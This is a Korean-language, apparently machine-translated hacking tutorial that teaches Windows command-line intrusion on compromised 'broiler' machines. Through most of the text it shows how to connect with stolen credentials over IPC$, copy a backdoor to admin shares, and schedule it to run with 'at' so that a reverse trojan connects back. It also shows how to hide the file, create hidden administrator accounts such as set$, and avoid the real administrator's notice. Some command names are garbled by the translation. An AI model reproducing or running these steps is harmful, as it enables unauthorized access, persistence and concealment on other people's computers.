DOS 명령 시작하기

침략할 때 누구나 DOS 명령을 사용하게 될 것입니다. 그 기능은 매우 강력합니다. 오늘은 주로 초보자와 DOS에 노출된 사람들을 위해 자세히 설명하겠습니다. 명령이 거의 없는 친구들을 위해 아래에서 좀 더 일반적으로 사용되는 몇 가지 명령을 선택해 이야기하겠습니다.

Windows 2000을 예로 들면 Windows XP도 비슷합니다.

DIR

현재 디스크 아래의 모든 폴더와 파일을 표시합니다.

더 일반적인 방법은 백도어나 서버(예: 이름은 Systems.exe)를 육계의 디스크에 업로드하는 것입니다. c:\winnt\ system32에서 업로드가 성공했는지 확인하려면 DIR 명령을 사용하면 됩니다.

DIR c:\winnt\system32\systems. exe

표시 내용:

2004-05-24 20:06 194,762 Systems.exe

1 파일 194,762바이트

0 디렉터리 사용 가능한 바이트 4,658,597,888

성공적으로 업로드하지 못한 경우 다음과 같이 표시됩니다.

C 드라이브의 볼륨에 레이블이 없습니다.

볼륨의 일련 번호는 6458-3DB8입니다.

c:\winnt\system32\ 디렉터리

파일을 찾을 수 없습니다.

CD

현재 디렉터리 변경

다음 명령을 자세히 살펴보세요.

C:\>cd winnt //winnt 폴더 입력

C:\winnt>cd system32 //system32 폴더로 들어가세요

C:\winnt\system32>cd.. //이전 디렉터리로 돌아갑니다

C:\ winnt> cd..

C:\>

C:\>d: //D 드라이브를 입력하세요

D:\>e: // E 드라이브를 입력하세요.

E:\>

del 및 deltree

DEL: 파일을 삭제합니다.

다음 명령을 참조하세요.

C:\>del c:\xx\ww.txt //C 드라이브의 XX 디렉터리에 있는 WW라는 파일을 삭제합니다.

C:\>

C :\>del c:\xx\*.* //C 드라이브의 XX 디렉터리에 있는 모든 파일을 삭제합니다.

deltree

이것은 더 파괴적입니다. 모든 파일만 삭제할 수 있으며, 폴더까지 삭제

C:\>deltree c:\winnt //C 드라이브 아래의 winnt 파일과 폴더를 모두 삭제합니다.

사용해야 합니다. 주의하세요.

attrid

파일이나 폴더 속성을 표시하고 변경합니다.

파일이나 폴더의 속성은 숨겨져 있으며 문자 H로 표시됩니다. 읽기 전용, R로 표시, 아카이브로 표시, A. 시스템으로 표시, S로 표시

파일이나 폴더의 속성을 변경하려면 "+"는 추가를 의미하고 "-"는 속성 제거를 의미합니다.

보통 우리는 모두 브로일러가 업로드된 c:\winnt\system32 아래에 백도어나 서비스를 넣습니다. 브로일러의 CMD에 들어간 후 브로일러 관리자가 알 수 없도록 업로드한 내용을 숨길 수 있습니다. 예를 들어, 위의 Systems.exe

명령은 다음과 같습니다:

C:\>attrid +h c:\winnt\system32\systems.exe //이런 식으로 , system32

C:\>attrid -h c:\winnt\system32\systems.exe //systems.exe의 숨겨진 속성 제거

copy에서 Systems.exe를 찾을 수 없습니다.

하나 이상의 파일을 다른 디렉터리에 복사

예를 들어 C 드라이브에 있는 1.txt라는 파일을 D 드라이브에 있는 vv 폴더에 복사합니다.

C:\>copy c:\1 .txt d:\vv\1.exe

예를 들어 육계와 IPC$ 연결을 설정했습니다(연결 방법은 무엇입니까? 제가 이야기하겠습니다). 나중에 설명) 브로일러가 *** 공유를 열었습니다. 예를 들어 D 드라이브를 열면 C 드라이브에 다운로드할 수 있습니다.

Systems.exe라는 백도어나 서버는 브로일러를 D 드라이브에 업로드합니다.

C:\>copy c:\systems.exe \\broiler IP\d$

입력

파일 내용 표시

이제 C 드라이브의 XX 디렉터리에 hack.txt라는 새 파일을 만듭니다. 내용은 일부 대만 IP입니다. >

명령어는 다음과 같습니다.

C:\>c:\xx\hack.txt를 입력하세요.

일련번호 시작 IP 주소 끝 IP 주소 국가/지방/지방자치단체 도시/지구/군/ 조직

58 024.179.140.000 024.179.150.255 대만 중국 성

80 061.013.000.000 061.013.255.255 대만 중국 성

86 061.058.065.000 061.058.07 0.255 중국 대만 성

87 061.059.160.000 061.059.255.255 대만 성, 중국

89 061.070.100.000 061.070.150.255 중국 대만

1788 061.217.179.000 061.217 .179.255 중국 대만성 타이난시

1789 061.216.000.000 061.219.255.255 중국 대만성

1790 061.220.080.000 61.220.150.255 중국 대만 성 타이베이 시

1791 061.224 .000.000 061.224.255.255 중국 대만 성 타이베이 시

1792 061.225.000.000 061.225.255.255 중국 대만 성

3390 134.208.000.000 134.208.255.255 대만 성, 중국

3584 139.175.000.000 139.175.255.255 대만 중국 성

3590 140.092.000.000 140.092 .255.255 대만 중국

3593 140.096.000.000 140.096.255 .255 중국 대만 성

3596 140.112.000.000 140.112.255.255 국립 대만 대학, 중국 대만 성

C :\>

또 다른 사용법이 있는데, 즉 브로일러의 CMD를 입력한 후 브로일러 사용법을 살펴보세요. 어떤 운영체제일까요? 에 대한 명령은 다음과 같습니다. 내 컴퓨터는 다음과 같습니다:

C:\>c:\boot.ini를 입력하세요.

[부트 로더]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[운영 체제]

multi(0)disk(0)rdisk( 0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"

/fastDetect

보이시나요?

이것은 XP 시스템입니다.

이것들은 일반적으로 사용되는 몇 가지 명령입니다. 다른 것에는 rd, md 등이 포함됩니다. 관심이 있으시면 Pingjin이 덜 일반적으로 사용되는 정보를 찾아보실 수 있습니다.

ping

이것은 가장 일반적으로 사용되는 명령이지만 현재는 대부분의 웹사이트와 개인용 컴퓨터에서 ping을 차단하는 데 사용되는 것 같습니다. 기본 명령:

ping ip

ping URL

다음 P는 우리 웹사이트입니다:

C:\>ping www.hf110.com

32바이트 데이터로 www.hf110.com [218.89.0.231]을 핑합니다:

218.89.0.231에서 응답: bytes=32 time=67ms TTL= 116

218.89.0.231에서 보낸 답장: bytes=32 time=67ms TTL=116

218.89.0.231에서 보낸 답장: bytes=32 time=66ms TTL=116

218.89.0.231에서 응답: bytes=32 time=67ms TTL=116

218.89.0.231에 대한 Ping 통계:

패킷: 전송 = 4, 수신 = 4, 손실 = 0(0% 손실),

대략적인 왕복 시간(밀리초):

최소 = 66ms, 최대 = 67ms, 평균 = 66ms

IP 이 사이트의 TTL=116에서 218.89.0.231로 대략적으로 Windows 운영체제를 사용하고 있음을 알 수 있습니다. 일반적으로 TTL 값이 128 정도인 것은 Windows 운영체제이고, TTL 값이 약 225는 대부분 Unix 시스템이지만 특별한 경우가 있습니다. 관리자는 레지스트리를 변경하여 TTL 값을 수정할 수 있습니다.

net use

브로일러의 사용자 이름과 비밀번호를 얻은 후. , 이 명령을 사용하여 IPC$ 연결을 만들 수 있습니다.

net use \\broiler ip\ipc$ "password" /user:"username"

연결이 성공한 후, 백도어나 서버를 업로드하세요(예: D 드라이브에 있는systems.exe).

copy D:\systems.exe \\broiler ip\c$ //여기에서 열려 있어야 합니다. 그렇지 않으면 업로드가 성공할 수 없습니다.

net time \\broiler ip //브로일러 시간을 보세요. 예를 들어 3입니다. 오후 10시 여기에 작성 15:10

at \\broiler ip 15:12 Systems.exe //15:12에 Systems.exe를 실행하세요.

여기서 리바운드 트로이 목마가 연결될 때까지 기다릴 수 있습니다. 실제로 침입 과정에서 위와 같이 IPC를 통해 성공적으로 연결되는 경우가 많습니다. net time\\broiler ip. 시간이 보이더라도 브로일러의 at 서비스가 열려 있어도 백도어가 있거나 서버가 실행되지 않는 경우가 있습니다.

바이러스 백신 소프트웨어에 의해 탐지될 수 있으므로 침입 과정에서 실패하는 경우가 많습니다.

net user

사용자를 보거나 새 사용자를 생성하세요.

이것은 내 컴퓨터의 스크린샷입니다.

C:\>net user

p>

\\BILLGATES의 사용자 계정

-------------------------------- ------------------------

게스트 손님1 HelpAssistant

SUPPORT_388945a0 yhkj

명령이 성공적으로 완료되었습니다.

C:\>

위의 사용자는 모두 내 사용자입니다.

이제 새로운 setwell 사용자를 생성하고 비밀번호는 123456이며 스크린샷은 다음과 같습니다.

C:\>net user setwell 123456 /add

명령이 성공적으로 완료되었습니다.

C:\>net localgroup Administrators setwell /add //setwell을 관리자로 추가하기 위한 명령입니다.

명령이 성공적으로 완료되었습니다.

다음으로 순 사용자를 보겠습니다. 그림은 다음과 같습니다.

C:\>순 사용자

\\BILLGATES 사용자 계정

------------------------------------- --------------

Guest guest1 HelpAssistant

setwell SUPPORT_388945a0 yhkj

명령이 성공적으로 완료되었습니다.

생성된 사용자는 net user 명령으로 볼 수 있습니다. 이번에는 set이라는 사용자를 생성합니다.

C:\>net user set$ 123456 /add

명령이 성공적으로 완료되었습니다.

C:\>net localgroup Administrators set$ /add

명령이 성공적으로 완료되었습니다.

C:\>순 사용자

\\BILLGATES의 사용자 계정

----------------- ---------------------------

게스트 손님1 HelpAssistant

setwell SUPPORT_388945a0 yhkj

명령이 성공적으로 완료되었습니다.

C:\>

보셨나요? 방금 생성한 사용자 set$을 보지 못했습니다. 이 명령을 사용하면 net localgroup 관리자가 표시됩니다. 모든 관리자, 아래 스크린샷:

C:\>net localgroup 관리자

별칭 관리자

참고 관리자는 컴퓨터/도메인 Quan에 대해 무제한의 전체 액세스 권한을 갖습니다.

회원

---------------------- - ------

guest1

set$

setwell

yhkj

명령이 성공적으로 완료되었습니다.

C:\>

보셨나요? set$ 사용자를 봤습니다.

사용자를 삭제하려면 다음 명령을 사용하세요.

C:\>net user setwell /delete

net start

1. 일부 서비스를 시작합니다.

예: net start telnet / /텔넷 서비스 시작

2. 현재 어떤 서비스가 시작되었는지 확인하세요. 내 컴퓨터에서 어떤 서비스가 시작되었는지 확인하세요:

C:\>net start

다음 Windows 서비스가 시작되었습니다:

자동 업데이트

COM+ 이벤트 시스템

암호화 서비스

DHCP 클라이언트

분산 링크 추적 클라이언트

DNS 클라이언트

오류 보고 서비스

이벤트 로그

도움말 및 지원

IPSEC 서비스

논리 디스크 관리자

메신저

이것은 서비스의 일부일 뿐입니다.

net stop

일부 서비스를 중지하세요. 오늘 이미 언급한 내용이 얼마 남지 않았습니다.

순 공유

기본 공유를 확인하세요. *** 공유 C$ D$ e$ f$ admin$ ipc$를 확인하세요. 이것이 시스템 기본값입니다. 내 것은 모두 꺼져 있습니다.

스크린샷을 찍으러 브로일러로 갑니다.

p>

C:\Documents and Settings\Administrator>순 공유

D$ D:\ 기본값 *** 공유

F$ F:\ 기본값 *** 공유

ADMIN$ C:\WINNT 원격 관리

C$ C:\기본 공유

E$ E:\기본 공유

명령이 성공적으로 완료되었습니다.

C:\Documents and Settings\Administrator>

이 브로일러의 IPC$*** 혜택이 꺼졌습니다.

순 보기

공유의 보기이기도 하지만 위의 기본 공유가 아닌 브로일러의 화면을 찍어보겠습니다.

C:\Documents and Settings\Administrator>net 보기입니다.

서버 이름 설명

------------------ --- ----------------------------------

\\17

\\HMZ

\\ZGH

명령이 성공적으로 완료되었습니다.

C:\Documents and Settings\Administrator>

DOS 명령을 배우는 것은 다소 귀찮아 보일 수도 있지만 실제로는 꽤 쉽습니다. 그리고 잘 배우면 알게 될 것입니다. 다음번에는 netstat 및 기타 명령에 대해 설명하겠습니다.

netstat -an

이 명령을 사용하여 머신에 대한 모든 연결을 살펴보세요. 내 컴퓨터의 스크린샷에서

D:\>netstat -an

활성 연결

Proto Local Address Foreign Address State

TCP 0.0.0.0:135 0.0 .0.0:0 듣기

TCP 0.0.0.0:1025 0.0.0.0:0 듣기

TCP 0.0.0.0:1029 0.0.0.0:0 듣기

설정됨

UDP 0.0.0.0:500 *:*

UDP 0.0.0.0:1035 *:*

UDP 0.0. 0.0:1037 *:*

UDP 0.0.0.0:1134 *:*

UDP 0.0.0.0:1136 *:*

프로토 로컬 주소 외부 주소 상태

프로토콜 로컬 포트 ​​및 IP 주소 원격 포트 및 IP 주소 상태

LISTENING 청취 상태는 상대방의 연결을 기다리는 것을 의미합니다.

ESTABLISHED 연결 중.

p>

TCP 프로토콜은 TCP입니다.

UDP 프로토콜은 UDP입니다.

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED

이는 tcp 프로토콜 기본 IP(218.95.49.187, 포트:2935 및 원격 IP(218.89.0.231) 포트: 80 연결

query

이 명령은 포트 3389만 엽니다(포트는 열리지 않습니다). 반드시 3389로 변경해야 합니다. 엄밀히 말하면 원격 터미널 서비스가 켜져 있는 경우 이 포트를 사용해야 합니다. 3389 시스템에 로그인하는 데 1$를 사용했습니다.

c:\> 사용자 쿼리

USERNAME SESSIONNAME ID STATE

관리자 콘솔 0 실행 중

1$ rdp-tcp#2 1 실행 중

보기 위 단계로 이동하지 않은 경우 관리자가 여기에 있습니다. 종료하려면 다음 명령을 사용하십시오.

여기서 로그오프 ID는 로그오프 1입니다.

이것은 정상적인 종료입니다.

다른 방법은 시작---종료---로그아웃 1$로 가는 것입니다. 다른 방법을 사용하여 로그아웃하면 브로일러가 종료될 때 "다른 손님이 이 서버에 로그인되었습니다."와 같은 메시지가 나타납니다. "라는 메시지가 나타납니다. , 로그아웃하면 상대방의 세션 데이터가 손실됩니다." 이런 식으로 관리자가 알 수 있습니다.